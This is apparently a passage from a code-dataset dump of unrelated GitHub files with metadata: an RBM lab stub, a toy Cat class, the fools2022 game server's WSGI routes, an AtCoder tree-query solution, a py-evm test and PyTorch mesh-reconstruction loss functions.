labels_in = total_input_for_each_unit[:, :-self.n_labels], total_input_for_each_unit[:,\n -self.n_labels:]\n left_p_v_given_h, labels_p_v_given_h = sigmoid(left_in), softmax(labels_in)\n left_v_sample, labels_v_sample = sample_binary(left_p_v_given_h), sample_categorical(labels_p_v_given_h)\n\n p_v_given_h = np.concatenate((left_p_v_given_h, labels_p_v_given_h), axis=1)\n v_sample = np.concatenate((left_v_sample, labels_v_sample), axis=1)\n\n else:\n\n p_v_given_h = sigmoid(total_input_for_each_unit)\n v_sample = sample_binary(p_v_given_h)\n\n return p_v_given_h, v_sample\n\n \"\"\" rbm as a belief layer : the functions below do not have to be changed until running a deep belief net \"\"\"\n\n def untwine_weights(self):\n\n self.weight_v_to_h = np.copy(self.weight_vh)\n self.weight_h_to_v = np.copy(np.transpose(self.weight_vh))\n self.weight_vh = None\n\n def get_h_given_v_dir(self, visible_minibatch):\n\n \"\"\"Compute probabilities p(h|v) and activations h ~ p(h|v)\n\n Uses directed weight \"weight_v_to_h\" and bias \"bias_h\"\n \n Args: \n visible_minibatch: shape is (size of mini-batch, size of visible layer)\n Returns: \n tuple ( p(h|v) , h) \n both are shaped (size of mini-batch, size of hidden layer)\n \"\"\"\n return self._get_h_given_v(visible_minibatch, self.weight_v_to_h)\n\n def get_v_given_h_dir(self, hidden_minibatch):\n\n \"\"\"Compute probabilities p(v|h) and activations v ~ p(v|h)\n\n Uses directed weight \"weight_h_to_v\" and bias \"bias_v\"\n \n Args: \n hidden_minibatch: shape is (size of mini-batch, size of hidden layer)\n Returns: \n tuple ( p(v|h) , v) \n both are shaped (size of mini-batch, size of visible layer)\n \"\"\"\n return self._get_v_given_h(hidden_minibatch, self.weight_h_to_v)\n\n def update_generate_params(self, inps, trgs, preds):\n\n \"\"\"Update generative weight \"weight_h_to_v\" and bias \"bias_v\"\n \n Args:\n inps: activities or probabilities of input unit\n trgs: activities or probabilities of output unit (target)\n preds: activities or probabilities of output unit (prediction)\n all args have shape (size of mini-batch, size of respective layer)\n \"\"\"\n\n # [TODO TASK 4.3] find 
the gradients from the arguments (replace the 0s below) and update the weight and bias parameters.\n\n self.delta_weight_h_to_v += 0\n self.delta_bias_v += 0\n\n self.weight_h_to_v += self.delta_weight_h_to_v\n self.bias_v += self.delta_bias_v\n\n return\n\n def update_recognize_params(self, inps, trgs, preds):\n\n \"\"\"Update recognition weight \"weight_v_to_h\" and bias \"bias_h\"\n\n Args:\n inps: activities or probabilities of input unit\n trgs: activities or probabilities of output unit (target)\n preds: activities or probabilities of output unit (prediction)\n all args have shape (size of mini-batch, size of respective layer)\n \"\"\"\n\n # [TODO TASK 4.3] find the gradients from the arguments (replace the 0s below) and update the weight and bias parameters.\n\n self.delta_weight_v_to_h += 0\n self.delta_bias_h += 0\n\n self.weight_v_to_h += self.delta_weight_v_to_h\n self.bias_h += self.delta_bias_h\n\n return\n","repo_name":"m43/kth-annda","sub_path":"demo/lab4/rbm.py","file_name":"rbm.py","file_ext":"py","file_size_in_byte":13561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33957539317","text":"class Cat:\r\n def __init__(self, color, age, weight, name, gender):\r\n self.color = color\r\n self.age = age\r\n self.weight = weight\r\n self.name = name\r\n self.gender = gender\r\n def print_info(self):\r\n if self.gender == 'male':\r\n print(f'{self.name} is a {self.color} cat. He is {self.age} years old and weighs {self.weight} lbs.')\r\n else:\r\n print(f'{self.name} is a {self.color} cat. She is {self.age} years old and weighs {self.weight} lbs.')\r\n\r\nGibson = Cat('black-gray-white-orange', 12, 12, \"Gibson\", \"male\")\r\nKitten = Cat('orange-white',7,15,'Kitten', 'male')\r\nTele = Cat('gray-white-orange', 11, 11, 'Tele', 'female')\r\n\r\nGibson.print_info()\r\nTele.print_info()\r\nKitten.print_info()\r\n","repo_name":"interrobanger/Python-Practice","sub_path":"ClassyCat.py","file_name":"ClassyCat.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13846157820","text":"import base64\nimport json\nimport time\n\nimport router\nimport config\nimport logger\nimport handlers\nimport auth\nimport datastore\nimport util\nimport achievements\nimport flags\nimport ratelimiter\nfrom headers import *\n\nimport wsgiserver\n\nrt = router.Router()\n\nTAG = \"Main\"\n\n@rt.route(\"^/\", [\"OPTIONS\"])\ndef appPreflightRequest(environ, start_response):\n start_response('200 OK', HEADERS_CORS)\n return []\n\n@rt.route(\"^/leaderboard\", [\"GET\"])\ndef appLeaderboard(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n with datastore.open_datastore(\"leaderboard\") as l:\n leaderboard = l.read()\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok(leaderboard[0:30])\n \n@rt.route(\"^/fullleaderboard\", [\"GET\"])\ndef appLeaderboardFull(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n with datastore.open_datastore(\"leaderboard\") as l:\n leaderboard = l.read()\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok(leaderboard)\n\n@rt.route(\"^/profile\", [\"GET\"])\ndef appProfile(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n uid = int(environ['PATH_INFO'].split('/')[-1])\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n 
start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n adm_info = None\n if auth.validate(1, environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')):\n html = \"%1\"\n html += \"\"\n flag_list = [i for i in dir(flags) if i.startswith(\"FLAG_\")]\n flag_list.sort(key=lambda x: eval(\"flags.%s\" % x))\n for flag in flag_list:\n if util.checkflag(user_datastore['state'], eval(\"flags.%s\" % flag)):\n html += \"%s = True\" % flag\n else:\n html += \"%s = False\" % flag\n html += \"
\"\n adm_info = [html, json.dumps(user_datastore)]\n return util.json_ok({\n \"username\": user_datastore['username'],\n \"score\": user_datastore['score'],\n \"achievements\": user_datastore['achievements'],\n \"lottery\": user_datastore['lottery'],\n \"admin\": adm_info,\n \"title\": user_datastore['title'],\n \"visited\": len(user_datastore['visited_maps'])\n })\n\n@rt.route(\"^/ping\", [\"GET\"])\ndef appPing(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n token = environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(-1, token):\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({\n \"logged_in\": False,\n \"uid\": 0\n })\n uid = auth.token_uid(token)\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS, [\n (\"X-FoolsRefreshToken\", auth.create(uid))\n ])\n )\n obj = {\n \"logged_in\": True,\n \"uid\": uid,\n \"username\": user_datastore['username'],\n \"score\": user_datastore['score'],\n \"wholesome\": user_datastore['wholesome'],\n \"achievements\": user_datastore['achievements'],\n \"titles\": user_datastore['titles'],\n \"lottery\": user_datastore['lottery'],\n \"message\": user_datastore['message'],\n \"title\": user_datastore['title']\n }\n return util.json_ok(obj)\n\n@rt.route(\"^/register\", [\"POST\"])\ndef appRegister(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 1)\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n creds = json.loads(environ['wsgi.input'].read(data_len))\n \n creds['u'] = creds['u'].strip()\n\n try: \n attempt_gen3_charset = util.utf8_to_gen3(creds['u'])\n if len(creds['u']) >= 16:\n raise RuntimeError(\"nope\")\n if len(creds['u']) < 1:\n raise RuntimeError(\"nope\")\n except:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(3, \"Invalid username. Username must contain at least 1 character, at most 15 characters, and only contain characters from the Gen III latin set.\")\n \n if len(creds['p1']) < 6:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(4, \"Password must be at least 6 characters.\")\n\n if creds['p1'] != creds['p2']:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(7, \"Passwords do not match.\")\n\n if len(creds['m']) > 150:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(5, \"Your message is too long.\")\n\n with datastore.open_global_datastore() as d:\n global_datastore = d.read()\n if 'uid_map' not in global_datastore:\n global_datastore['uid_map'] = {}\n\n if creds['u'] in global_datastore['uid_map']:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(6, \"This username already exists. 
Choose a different username.\")\n\n uid = 1\n while uid in global_datastore['uid_map'].values():\n uid = util.rand(100, 9999999)\n\n global_datastore['uid_map'][creds['u']] = uid\n d.write(global_datastore)\n \n logger.log(TAG, \"registering user id %i\" % uid)\n\n udata = {\n \"username\": creds['u'],\n \"password\": auth.pw_hash(creds['p1']),\n \"uid\": uid,\n \"fun\": util.rand(0, 256),\n \"special_flags\": [],\n \"state\": [0]*32,\n \"score\": -1,\n \"wholesome\": 0,\n \"achievements\": [],\n \"titles\": [],\n \"lottery\": 0,\n \"message\": creds['m'],\n \"update\": 0,\n \"title\": \"New Adventurer\",\n \"visited_maps\": {},\n \"yeet\": {'id': 0, 'index': 0, 'start': 0},\n \"ip\": environ['REMOTE_ADDR']\n }\n achievements.check_player_completion(udata)\n with datastore.open_user_datastore(uid) as d:\n d.write(udata)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({\n \"username\": creds['u'],\n \"uid\": uid,\n \"session\": auth.create(uid),\n \"scope\": \"fools2022\"\n })\n\n@rt.route(\"^/login\", [\"POST\"])\ndef appLogin(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 1)\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n creds = json.loads(environ['wsgi.input'].read(data_len))\n\n with datastore.open_global_datastore() as d:\n global_datastore = d.read()\n \n if creds['u'] not in global_datastore['uid_map']:\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(2, \"Incorrect username or password\")\n\n uid = global_datastore['uid_map'][creds['u']]\n\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n \n if not auth.pw_compare(creds['p'], user_datastore['password']):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(2, \"Incorrect username or password\")\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({\n \"session\": auth.create(uid),\n \"uid\": uid,\n \"scope\": \"fools2022\"\n })\n\n@rt.route(\"^/packet/[0-9]+/?$\", [\"POST\"])\ndef appRequest(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 1)\n # only allow authorized requests\n uid = int(environ['PATH_INFO'].split('/')[-1])\n token = environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(uid, token):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [b'ERR_INVALID_TOKEN']\n\n try:\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n data = base64.b64decode(environ['wsgi.input'].read(data_len))\n r = base64.b64encode(handlers.handle_packet(uid, data, False))\n except handlers.FoolsMapAccessDeniedError as ex:\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(repr(ex), 'utf-8')]\n except handlers.FoolsDescriptiveProcessingError as ex:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(repr(ex), 'utf-8')]\n except handlers.FoolsPacketHandlerError as ex:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(\"FoolsPacketHandlerError('malformed packet')\", 'utf-8')]\n \n with datastore.open_user_datastore(uid) as d:\n udata = d.read()\n achievements.check_player_completion(udata)\n d.write(udata)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_TEXT, HEADERS_CORS, [\n 
(\"X-FoolsRefreshToken\", auth.create(uid)),\n (\"X-FoolsProtocolVersion\", str(config.PROTOCOL_VERSION))\n ])\n )\n return [r]\n \n@rt.route(\"^/turbopacket/[0-9]+/?$\", [\"POST\"])\ndef appTurboRequest(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 2)\n # only allow authorized requests\n uid = int(environ['PATH_INFO'].split('/')[-1])\n token = environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(uid, token):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [b'ERR_INVALID_TOKEN']\n\n try:\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n data = base64.b64decode(environ['wsgi.input'].read(data_len))\n r = base64.b64encode(handlers.handle_packet(uid, data, True))\n except handlers.FoolsMapAccessDeniedError as ex:\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(repr(ex), 'utf-8')]\n except handlers.FoolsDescriptiveProcessingError as ex:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(repr(ex), 'utf-8')]\n except handlers.FoolsPacketHandlerError as ex:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(\"FoolsPacketHandlerError('malformed packet')\", 'utf-8')]\n\n with datastore.open_user_datastore(uid) as d:\n udata = d.read()\n achievements.check_player_completion(udata)\n d.write(udata)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_TEXT, HEADERS_CORS, [\n (\"X-FoolsRefreshToken\", auth.create(uid)),\n (\"X-FoolsProtocolVersion\", str(config.PROTOCOL_VERSION))\n ])\n )\n return [r]\n\n@rt.route(\"^/message\", [\"POST\"])\ndef appSetMessage(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n data = json.loads(environ['wsgi.input'].read(data_len))\n \n token = environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(-1, token):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(20, \"Invalid or expired session token\")\n uid = auth.token_uid(token)\n \n if len(data['message']) > 150:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(5, \"Your message is too long.\")\n\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n user_datastore['message'] = data['message']\n d.write(user_datastore)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({})\n \n@rt.route(\"^/title\", [\"POST\"])\ndef appSetTitle(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n data = json.loads(environ['wsgi.input'].read(data_len))\n \n token = environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(-1, token):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(20, \"Invalid or expired session token\")\n uid = auth.token_uid(token)\n\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n if data['title'] not in user_datastore['titles']:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(5, \"This title was not unlocked yet\")\n user_datastore['title'] = data['title']\n 
achievements.update_leaderboard_record(user_datastore)\n d.write(user_datastore)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({})\n\n@rt.route(\"^/wholesome\", [\"POST\"])\ndef appSetWholesome(environ, start_response):\n # This one was used to grant the Wholesome Reward in the original event,\n # but that's removed in unofficial releases, to avoid confusing users.\n \n # \"hello ZZAZZ this reward code does not work on this random server you\n # have zero control of, I paid you money for this, I demand a refund!!!\"\n \n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(41, \"You can't become wholesome on this unofficial server\")\n\n@rt.route(\"^/automation\", [\"GET\"])\ndef appAutomationMessage(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n start_response(\n '200 OK',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n with open('automation.txt', 'rb') as f:\n contents = f.read()\n return [contents]\n\n@rt.route(\"^.*$\")\ndef appDefault(environ, start_response):\n start_response(\n '404 Bepis', \n construct_headers(HEADERS_HTML, HEADERS_CORS)\n )\n html = '''\n \n \n Click here if your browser doesn't redirect you automatically.\n 
\n '''\n return [bytes(html, 'utf-8')]\n\nif __name__ == \"__main__\":\n logger.log(TAG, \"Server started\")\n server = wsgiserver.WSGIServer(rt, host='127.0.0.1', port=6937)\n server.start()\n","repo_name":"zzazzdzz/fools2022","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15700,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"40129044914","text":"# included from libs/graph_to_tree.py\ndef graph_to_tree(N, edges, root):\n from collections import defaultdict\n children = defaultdict(list)\n parents = [None] * N\n root = 0\n parents[root] = root\n stack = [root]\n while stack:\n v = stack.pop()\n for u in edges[v]:\n if parents[u] is not None:\n # already visited\n continue\n parents[u] = v\n children[v].append(u)\n stack.append(u)\n return children, parents\n\n# end of libs/graph_to_tree.py\n\n# included from snippets/main.py\n\n\ndef debug(*x, msg=\"\"):\n import sys\n print(msg, *x, file=sys.stderr)\n\n\ndef solve(SOLVE_PARAMS):\n pass\n\n\ndef main():\n from collections import defaultdict\n N = int(input())\n edges = defaultdict(list)\n AS = []\n BS = []\n for _i in range(N - 1):\n a, b = map(int, input().split())\n a -= 1\n b -= 1\n AS.append(a)\n BS.append(b)\n edges[a].append(b)\n edges[b].append(a)\n\n root = 0\n children, parents = graph_to_tree(N, edges, root)\n veterx_diff = [0] * N\n\n Q = int(input())\n for _q in range(Q):\n t, e, x = map(int, input().split())\n e -= 1\n a = AS[e]\n b = BS[e]\n if t == 1:\n if parents[a] == b:\n veterx_diff[a] += x\n else:\n veterx_diff[root] += x\n veterx_diff[b] -= x\n else:\n if parents[a] == b:\n veterx_diff[root] += x\n veterx_diff[a] -= x\n else:\n veterx_diff[b] += x\n\n finish = [0] * N\n\n stack = [(root, 0)]\n while stack:\n v, x = stack.pop()\n x += veterx_diff[v]\n finish[v] += x\n for c in children[v]:\n stack.append((c, x))\n\n print(*finish, sep=\"\\n\")\n\n\n# tests\nT1 = \"\"\"\n5\n1 2\n2 3\n2 4\n4 5\n4\n1 1 1\n1 4 10\n2 1 100\n2 2 1000\n\"\"\"\nTEST_T1 = \"\"\"\n>>> as_input(T1)\n>>> main()\n11\n110\n1110\n110\n100\n\"\"\"\n\nT2 = \"\"\"\n7\n2 1\n2 3\n4 2\n4 5\n6 1\n3 7\n7\n2 2 1\n1 3 2\n2 2 4\n1 6 8\n1 3 16\n2 4 32\n2 1 64\n\"\"\"\nTEST_T2 = \"\"\"\n>>> as_input(T2)\n>>> main()\n72\n8\n13\n26\n58\n72\n5\n\"\"\"\n\nT3 = \"\"\"\n11\n2 1\n1 3\n3 4\n5 2\n1 6\n1 7\n5 8\n3 9\n3 10\n11 4\n10\n2 6 688\n1 10 856\n1 8 680\n1 8 182\n2 2 452\n2 4 183\n2 6 518\n1 3 612\n2 6 339\n2 3 206\n\"\"\"\nTEST_T3 = \"\"\"\n>>> as_input(T3)\n>>> main()\n1657\n1657\n2109\n1703\n1474\n1657\n3202\n1474\n1247\n2109\n2559\n\"\"\"\n\n\ndef _test():\n import doctest\n doctest.testmod()\n g = globals()\n for k in sorted(g):\n if k.startswith(\"TEST_\"):\n print(k)\n doctest.run_docstring_examples(g[k], g, name=k)\n\n\ndef as_input(s):\n \"use in test, use given string as input file\"\n import io\n f = io.StringIO(s.strip())\n g = globals()\n g[\"input\"] = lambda: bytes(f.readline(), \"ascii\")\n g[\"read\"] = lambda: bytes(f.read(), \"ascii\")\n\n\nif __name__ == \"__main__\":\n import sys\n input = sys.stdin.buffer.readline\n read = sys.stdin.buffer.read\n sys.setrecursionlimit(10 ** 6)\n if sys.argv[-1] == \"-t\":\n print(\"testing\")\n _test()\n sys.exit()\n main()\n sys.exit()\n\n# end of snippets/main.py\n","repo_name":"nishio/atcoder","sub_path":"abc187/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"7177322259","text":"import 
pytest\n\nfrom eth_bloom import (\n BloomFilter,\n)\n\nfrom eth.abc import (\n ReceiptBuilderAPI,\n TransactionBuilderAPI,\n)\nfrom eth.chains.mainnet import (\n MAINNET_VMS,\n)\nfrom eth.rlp.headers import (\n BlockHeader,\n)\n\n\n@pytest.fixture(scope=\"module\")\ndef genesis_header():\n return BlockHeader(\n difficulty=0,\n block_number=0,\n gas_limit=10000,\n )\n\n\n@pytest.mark.parametrize(\"vm_class\", MAINNET_VMS)\ndef test_vm_block_class_is_properly_configured(\n vm_class,\n genesis_header,\n):\n vm_block_instance = vm_class.get_block_class()(genesis_header)\n\n txn_builder = vm_block_instance.get_transaction_builder()\n assert txn_builder is not None\n assert issubclass(txn_builder, TransactionBuilderAPI)\n\n receipt_builder = vm_block_instance.get_receipt_builder()\n assert receipt_builder is not None\n assert issubclass(receipt_builder, ReceiptBuilderAPI)\n\n bloom_filter = vm_block_instance.bloom_filter\n assert bloom_filter is not None\n assert isinstance(bloom_filter, BloomFilter)\n\n assert vm_block_instance.number == genesis_header.block_number == 0\n assert vm_block_instance.hash == genesis_header.hash\n","repo_name":"ethereum/py-evm","sub_path":"tests/core/vm/test_vm_class_configurations.py","file_name":"test_vm_class_configurations.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":2109,"dataset":"github-code","pt":"6"} +{"seq_id":"26460164995","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pickle\nimport scipy.misc\nimport numpy as np\nimport os.path as osp\n\nimport torch\nimport torch.nn as nn\nimport torchvision.utils as vutils\n\nfrom . import geom_utils\nfrom . import scops_utils\nfrom .smr import SoftRenderer\nfrom .nmr_pytorch import NeuralRenderer\nfrom .chamfer_python import distChamfer\nfrom ..utils import image as image_utils\n\nclass edge_regularization(nn.Module):\n def __init__(self, edges):\n super(edge_regularization,self).__init__()\n self.edges = edges.long()\n\n def forward(self, pred):\n \"\"\"\n :param pred: batch_size * num_points * 3\n :param edges: num_edges * 2\n :return:\n \"\"\"\n l2_loss = nn.MSELoss(reduction='mean')\n return l2_loss(pred[:, self.edges[:, 0]], pred[:, self.edges[:, 1]]) * pred.size(-1)\n\ndef neg_iou_loss(predict, target, avg = True):\n dims = tuple(range(predict.ndimension())[1:])\n intersect = (predict * target).sum(dims)\n union = (predict + target - predict * target).sum(dims) + 1e-6\n if(avg):\n return 1. - (intersect / union).sum() / intersect.nelement()\n else:\n return 1. 
- (intersect / union)\n\ndef texture_dt_loss(texture_flow, dist_transf, vis_rend=None, cams=None, verts=None, tex_pred=None):\n \"\"\"\n texture_flow: B x F x T x T x 2\n (In normalized coordinate [-1, 1])\n dist_transf: B x 1 x N x N\n\n Similar to geom_utils.sample_textures\n But instead of sampling image, it samples dt values.\n \"\"\"\n # Reshape into B x F x T*T x 2\n T = texture_flow.size(-2)\n F = texture_flow.size(1)\n flow_grid = texture_flow.view(-1, F, T * T, 2)\n # B x 1 x F x T*T\n dist_transf = torch.nn.functional.grid_sample(dist_transf, flow_grid)\n\n if vis_rend is not None:\n # Visualize the error!\n # B x 3 x F x T*T\n dts = dist_transf.repeat(1, 3, 1, 1)\n # B x 3 x F x T x T\n dts = dts.view(-1, 3, F, T, T)\n # B x F x T x T x 3\n dts = dts.permute(0, 2, 3, 4, 1)\n dts = dts.unsqueeze(4).repeat(1, 1, 1, 1, T, 1) / dts.max()\n\n from ..utils import bird_vis\n for i in range(dist_transf.size(0)):\n rend_dt = vis_rend(verts[i], cams[i], dts[i])\n rend_img = bird_vis.tensor2im(tex_pred[i].data)\n import matplotlib.pyplot as plt\n plt.ion()\n fig=plt.figure(1)\n plt.clf()\n ax = fig.add_subplot(121)\n ax.imshow(rend_dt)\n ax = fig.add_subplot(122)\n ax.imshow(rend_img)\n import ipdb; ipdb.set_trace()\n\n return dist_transf.mean()\n\n\ndef texture_loss(img_pred, img_gt, mask_gt):\n \"\"\"\n Input:\n img_pred, img_gt: B x 3 x H x W\n mask_pred, mask_gt: B x H x W\n \"\"\"\n mask_gt = mask_gt.unsqueeze(1)\n\n return torch.nn.L1Loss()(img_pred * mask_gt, img_gt * mask_gt)\n\ndef texture_loss_masks(img_pred, img_gt, mask_gt, mask_pred, avg=True):\n \"\"\"\n Input:\n img_pred, img_gt: B x 3 x H x W\n mask_pred, mask_gt: B x H x W\n \"\"\"\n mask_gt = mask_gt.unsqueeze(1)\n mask_pred = mask_pred.unsqueeze(1)\n if(avg):\n return torch.nn.L1Loss()(img_pred * mask_pred, img_gt * mask_gt)\n else:\n loss = torch.nn.L1Loss(reduction = 'none')(img_pred * mask_pred, img_gt * mask_gt)\n loss = torch.sum(loss, dim = (1, 2, 3)) / (loss.size(1) * loss.size(2) * loss.size(3))\n return loss\n\ndef deform_l2reg(V):\n \"\"\"\n l2 norm on V = B x N x 3\n \"\"\"\n V = V.view(-1, V.size(2))\n return torch.mean(torch.norm(V, p=2, dim=1))\n\ndef sym_reg(verts):\n return torch.mean(torch.abs(verts[:,:,1]))\n\nclass PerceptualTextureLoss(object):\n def __init__(self):\n from .perceptual_loss import PerceptualLoss\n self.perceptual_loss = PerceptualLoss()\n\n def __call__(self, img_pred, img_gt, mask_gt, mask_pred=None, avg = True):\n \"\"\"\n Input:\n img_pred, img_gt: B x 3 x H x W\n mask_pred, mask_gt: B x H x W\n \"\"\"\n mask_gt = mask_gt.unsqueeze(1)\n if(mask_pred is not None):\n mask_pred = mask_pred.unsqueeze(1)\n dist = self.perceptual_loss(img_pred * mask_pred, img_gt * mask_gt)\n else:\n dist = self.perceptual_loss(img_pred * mask_gt, img_gt * mask_gt)\n\n # Only use mask_gt..\n if(avg):\n return dist.mean()\n else:\n return dist\n\nclass TexCycle(nn.Module):\n def __init__(self, im_size = 256, nf = 1280, eps = 1e-12):\n super(TexCycle,self).__init__()\n\n def forward(self, flow, prob, aggr_info):\n \"\"\"\n INPUTS:\n - flow: learned texture flow (nb * nf * nr * nr * 2)\n - prob: affinity between image & mesh by renderer (nb * nf * 2)\n - aggr_info: provide information about visible faces.\n OUTPUTS:\n - texture cycle loss\n IDEA:\n - make averaged coords of projected face equals to predicted flow\n \"\"\"\n nb, nf, nr, _, _ = flow.size()\n\n flow_grid = flow.view(nb, nf, -1, 2)\n avg_flow = torch.mean(flow_grid, dim = 2)\n\n # mask: nb x nf x 2\n # only rows correspond to visible faces are 
set to 1\n mask = torch.zeros(avg_flow.size())\n for cnt in range(nb):\n fids = torch.unique(aggr_info[cnt]).long()\n mask[cnt, fids, :] = 1\n\n mask = mask.cuda()\n loss = torch.nn.MSELoss()(avg_flow * mask, prob * mask)\n # second term for visilization purpose\n return loss, avg_flow[0, 0:10, :]\n\ndef entropy_loss(A):\n \"\"\"\n Input is K x N\n Each column is a prob of vertices being the one for k-th keypoint.\n We want this to be sparse = low entropy.\n \"\"\"\n entropy = -torch.sum(A * torch.log(A), 1)\n # Return avg entropy over\n return torch.mean(entropy)\n\nclass CorrLossChamfer(nn.Module):\n def __init__(self, scops_path, image_size):\n super(CorrLossChamfer,self).__init__()\n head_vertices = np.load(osp.join(scops_path, \"vertices_idx/head_vertices.npy\"))\n self.head_vertices = torch.from_numpy(head_vertices).long()\n self.head_num = len(self.head_vertices)\n\n belly_vertices = np.load(osp.join(scops_path, \"vertices_idx/belly_vertices.npy\"))\n self.belly_vertices = torch.from_numpy(belly_vertices).long()\n self.belly_num = len(self.belly_vertices)\n\n neck_vertices = np.load(osp.join(scops_path, \"vertices_idx/neck_vertices.npy\"))\n self.neck_vertices = torch.from_numpy(neck_vertices).long()\n self.neck_num = len(self.neck_vertices)\n\n back_vertices = np.load(osp.join(scops_path, \"vertices_idx/back_vertices.npy\"))\n self.back_vertices = torch.from_numpy(back_vertices).long()\n self.back_num = len(self.back_vertices)\n\n self.renderer = SoftRenderer(image_size)\n self.weights = [1, 1, 0, 0]\n\n nums = [self.head_vertices.size(0)]\n nums.append(nums[0] + self.belly_vertices.size(0))\n nums.append(nums[1] + self.neck_vertices.size(0))\n nums.append(nums[2] + self.back_vertices.size(0))\n self.nums = nums\n\n\n def forward(self, head_points, belly_points, neck_points, back_points, verts, cams, avg = True):\n bs = head_points.size(0)\n\n # predicted vertices\n head_vert_coords = verts[:, self.head_vertices, :]\n belly_vert_coords = verts[:, self.belly_vertices, :]\n back_vert_coords = verts[:, self.back_vertices, :]\n neck_vert_coords = verts[:, self.neck_vertices, :]\n\n vert_coords = 